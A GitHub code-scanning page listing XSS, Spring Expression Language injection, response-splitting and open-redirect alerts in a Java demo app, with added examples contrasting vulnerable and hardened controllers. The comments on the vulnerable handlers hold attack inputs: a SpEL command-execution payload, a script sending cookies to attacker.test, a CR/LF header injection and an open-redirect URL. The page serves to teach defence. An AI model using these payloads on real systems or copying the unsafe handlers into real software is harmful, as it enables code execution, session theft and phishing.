Add OpenTaint + ZAP action and more controllers #5

Commit f76e828 (pull request closed)
GitHub Advanced Security / OpenTaint failed Mar 25, 2026 in 10s

19 new alerts including 11 errors

New alerts in code changed by this pull request

  • 11 errors
  • 8 warnings

See annotations below for details.

Annotations

Check failure on line 123 in src/main/java/org/seqra/demo/controller/TemplateController.java

Code scanning / OpenTaint

Potential cross-site scripting (XSS) Error

Potential XSS: writing user input directly to a web page.

Check failure on line 117 in src/main/java/org/seqra/demo/controller/TemplateController.java

Code scanning / OpenTaint

Potential expression language injection Error

Potential code injection: calling Spring Expression Language method directly with user-supplied input may allow an adversary to read or modify sensitive data, bypass security checks, or, in severe cases, execute arbitrary code within the application's context.

Check failure on line 92 in src/main/java/org/seqra/demo/controller/TemplateController.java

Code scanning / OpenTaint

Potential cross-site scripting (XSS) Error

Potential XSS: writing user input directly to a web page.

Check failure on line 86 in src/main/java/org/seqra/demo/controller/TemplateController.java

Code scanning / OpenTaint

Potential expression language injection Error

Potential code injection: calling Spring Expression Language method directly with user-supplied input may allow an adversary to read or modify sensitive data, bypass security checks, or, in severe cases, execute arbitrary code within the application's context.

Check failure on line 70 in src/main/java/org/seqra/demo/controller/TemplateController.java

Code scanning / OpenTaint

Potential cross-site scripting (XSS) Error

Potential XSS: writing user input directly to a web page.

Check failure on line 69 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint

Potential cross-site scripting (XSS) Error

Potential XSS: writing user input directly to a web page.

Check failure on line 64 in src/main/java/org/seqra/demo/controller/TemplateController.java

Code scanning / OpenTaint

Potential expression language injection Error

Potential code injection: calling Spring Expression Language method directly with user-supplied input may allow an adversary to read or modify sensitive data, bypass security checks, or, in severe cases, execute arbitrary code within the application's context.

Check failure on line 43 in src/main/java/org/seqra/demo/controller/TemplateController.java

Code scanning / OpenTaint

Potential cross-site scripting (XSS) Error

Potential XSS: writing user input directly to a web page.

Check failure on line 92 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint + ZAP

Potential cross-site scripting (XSS) Error

Potential XSS: writing user input directly to a web page.

Check failure on line 37 in src/main/java/org/seqra/demo/controller/TemplateController.java

Code scanning / OpenTaint

Potential expression language injection Error

Potential code injection: calling Spring Expression Language method directly with user-supplied input may allow an adversary to read or modify sensitive data, bypass security checks, or, in severe cases, execute arbitrary code within the application's context.
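The pattern this rule fires on, as an added illustration written for this page rather than code from the scanned repository (the controller class, routes and parameter names are hypothetical): a Spring controller that parses and evaluates a SpEL expression taken straight from the request, next to a version where user input is only ever bound as data under a restricted evaluation context.

```java
// Added example for this page; not code from the org.seqra.demo controllers.
// Class, route and parameter names are hypothetical.
import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class SpelDemoController {

    private final ExpressionParser parser = new SpelExpressionParser();

    // VULNERABLE: the whole expression text comes from the query string and is
    // evaluated with the default StandardEvaluationContext, which permits type
    // references, constructors and method calls. A request such as
    //   /eval?expr=T(java.lang.Runtime).getRuntime().exec('id')
    // therefore runs a command in the application's context.
    @GetMapping("/eval")
    public String evalUnsafe(@RequestParam String expr) {
        Expression e = parser.parseExpression(expr);
        return String.valueOf(e.getValue());
    }

    // HARDENED: the expression is a fixed, developer-written string; the user
    // value is exposed only as a variable (#name), and the read-only
    // SimpleEvaluationContext rejects T() references, constructors, bean
    // references and method invocation, so the data cannot become code.
    @GetMapping("/greet")
    public String greetSafe(@RequestParam String name) {
        SimpleEvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        ctx.setVariable("name", name);
        Expression e = parser.parseExpression("'Hello, ' + #name");
        return e.getValue(ctx, String.class);
    }
}
```

The fix that removes the finding is the first one: never let request data become the expression string. The restricted context is defence in depth for cases where an expression must be evaluated against user-supplied objects; it does not make evaluating attacker-written expressions safe.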

Check failure on line 105 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint + ZAP

Potential cross-site scripting (XSS) Error

Potential XSS: writing user input directly to a web page.
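The sink behind the XSS alerts above, as an added illustration written for this page and not code from the scanned repository (class, routes and parameter names are hypothetical): a controller that writes a request parameter into an HTML response body unescaped, beside a version that HTML-escapes the value and adds a Content-Security-Policy header as a second layer. The servlet import assumes a Spring Boot 3 / Jakarta EE application.

```java
// Added example for this page; not code from the org.seqra.demo controllers.
// Class, route and parameter names are hypothetical; jakarta.servlet assumes Spring Boot 3.
import jakarta.servlet.http.HttpServletResponse;
import org.springframework.http.MediaType;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.util.HtmlUtils;

import java.io.IOException;

@RestController
public class EchoDemoController {

    // VULNERABLE: the raw parameter is concatenated into HTML and written to
    // the response. A value of <script>document.location='https://attacker.test/?c='+document.cookie</script>
    // is reflected as markup and executed in the victim's browser.
    @GetMapping("/echo")
    public void echoUnsafe(@RequestParam String q, HttpServletResponse resp) throws IOException {
        resp.setContentType("text/html;charset=UTF-8");
        resp.getWriter().write("<p>You searched for: " + q + "</p>");
    }

    // HARDENED: encode for the HTML element context before concatenation, and
    // ship a CSP so that even a missed sink cannot load or run injected script.
    @GetMapping(value = "/echo-safe", produces = MediaType.TEXT_HTML_VALUE)
    public ResponseEntity<String> echoSafe(@RequestParam String q) {
        String body = "<p>You searched for: " + HtmlUtils.htmlEscape(q) + "</p>";
        return ResponseEntity.ok()
                .header("Content-Security-Policy", "default-src 'self'")
                .contentType(MediaType.TEXT_HTML)
                .body(body);
    }
}
```

HtmlUtils.htmlEscape is the right encoder for text between tags and for double-quoted attribute values; a value placed inside a JavaScript string, a URL, or an unquoted attribute needs the encoder for that context instead. With a template engine, the same rule applies: use the escaping output construct (for example Thymeleaf th:text rather than th:utext) for anything derived from the request.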

Check warning on line 103 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint

HTTP response splitting Warning

HTTP response splitting can occur when user-controlled input containing CR/LF characters is written into an HTTP response header; older Java application servers do not reject such values, so an attacker can terminate the header and inject further headers or a second response body.

Check warning on line 86 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint + ZAP

HTTP response splitting Warning

HTTP response splitting can occur when user-controlled input containing CR/LF characters is written into an HTTP response header; older Java application servers do not reject such values, so an attacker can terminate the header and inject further headers or a second response body.

Check warning on line 79 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint + ZAP

HTTP response splitting Warning

HTTP response splitting can occur when user-controlled input containing CR/LF characters is written into an HTTP response header; older Java application servers do not reject such values, so an attacker can terminate the header and inject further headers or a second response body.

Check warning on line 51 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint + ZAP

Application redirects to user-manipulated URL which can be malicious Warning

Application redirects to a destination URL specified by a user-supplied parameter that is not validated. This could direct users to malicious locations. Consider using an allowlist to validate URLs.

Check warning on line 48 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint

HTTP response splitting Warning

HTTP response splitting can occur when user-controlled input containing CR/LF characters is written into an HTTP response header; older Java application servers do not reject such values, so an attacker can terminate the header and inject further headers or a second response body.

Check warning on line 44 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint

HTTP response splitting Warning

HTTP response splitting can occur when user-controlled input containing CR/LF characters is written into an HTTP response header; older Java application servers do not reject such values, so an attacker can terminate the header and inject further headers or a second response body.

Check warning on line 31 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint

HTTP response splitting Warning

HTTP response splitting can occur when user-controlled input containing CR/LF characters is written into an HTTP response header; older Java application servers do not reject such values, so an attacker can terminate the header and inject further headers or a second response body.

Check warning on line 28 in src/main/java/org/seqra/demo/controller/RedirectController.java

Code scanning / OpenTaint

HTTP response splitting Warning

HTTP response splitting can occur when user-controlled input containing CR/LF characters is written into an HTTP response header; older Java application servers do not reject such values, so an attacker can terminate the header and inject further headers or a second response body.
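Both warning classes raised against RedirectController above (user-manipulated redirect target and CR/LF reaching a response header) come from the same sink, a request value copied into the Location header, so one added example covers them. This is illustration code written for this page, not code from the scanned repository; the class, routes, parameter names and the allowlisted hosts are hypothetical, and the servlet import assumes a Spring Boot 3 / Jakarta EE application.

```java
// Added example for this page; not code from the org.seqra.demo controllers.
// Class, routes, parameter names and allowlisted hosts are hypothetical.
import jakarta.servlet.http.HttpServletResponse;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;

import java.io.IOException;
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;
import java.util.Set;

@Controller
public class RedirectDemoController {

    // Hosts this application is willing to send users to (constructed for the example).
    private static final Set<String> ALLOWED_HOSTS = Set.of("app.example.test", "docs.example.test");

    // VULNERABLE: the parameter becomes the Location header unchanged.
    //   /go?url=https://attacker.test/login      -> open redirect (phishing)
    //   /go?url=/ok%0d%0aSet-Cookie:%20a=b        -> response splitting on containers
    //                                                that do not strip CR/LF from headers
    @GetMapping("/go")
    public void goUnsafe(@RequestParam String url, HttpServletResponse resp) throws IOException {
        resp.sendRedirect(url);
    }

    // HARDENED: the target is validated against an allowlist, and anything
    // containing control characters is dropped before it can reach a header.
    @GetMapping("/go-safe")
    public void goSafe(@RequestParam String url, HttpServletResponse resp) throws IOException {
        resp.sendRedirect(safeRedirectTarget(url));
    }

    // Returns a redirect target that is either a local path or an https URL on
    // an allowlisted host; everything else falls back to the site root.
    static String safeRedirectTarget(String candidate) {
        // 1. Reject CR, LF and other control characters outright: they can only
        //    mean header injection. @RequestParam has already URL-decoded %0d%0a.
        if (candidate.chars().anyMatch(c -> c < 0x20 || c == 0x7f)) {
            return "/";
        }
        URI uri;
        try {
            uri = new URI(candidate);
        } catch (URISyntaxException e) {
            return "/";                       // anything the parser rejects is not a valid target
        }
        // 2. A same-site path: no scheme and no authority. "//evil.test/x" has an
        //    authority and is excluded, as is "\\evil.test", which fails to parse.
        if (uri.getScheme() == null && uri.getRawAuthority() == null && candidate.startsWith("/")) {
            return candidate;
        }
        // 3. An absolute URL: https only, and the parsed host (not a prefix of the
        //    string, so "https://app.example.test@evil.test/" is rejected) must be allowlisted.
        if ("https".equalsIgnoreCase(uri.getScheme()) && uri.getHost() != null
                && ALLOWED_HOSTS.contains(uri.getHost().toLowerCase(Locale.ROOT))) {
            return uri.toString();
        }
        return "/";
    }
}
```

Current Tomcat and Jetty releases already refuse header values containing CR/LF, which is why the scanner rates the splitting finding as a warning tied to older servers; the explicit check is cheap defence in depth and also stops the value from being logged or reflected elsewhere with the control characters intact. Validating the parsed host rather than matching a string prefix is what closes the userinfo and scheme-relative bypasses that defeat naive allowlists.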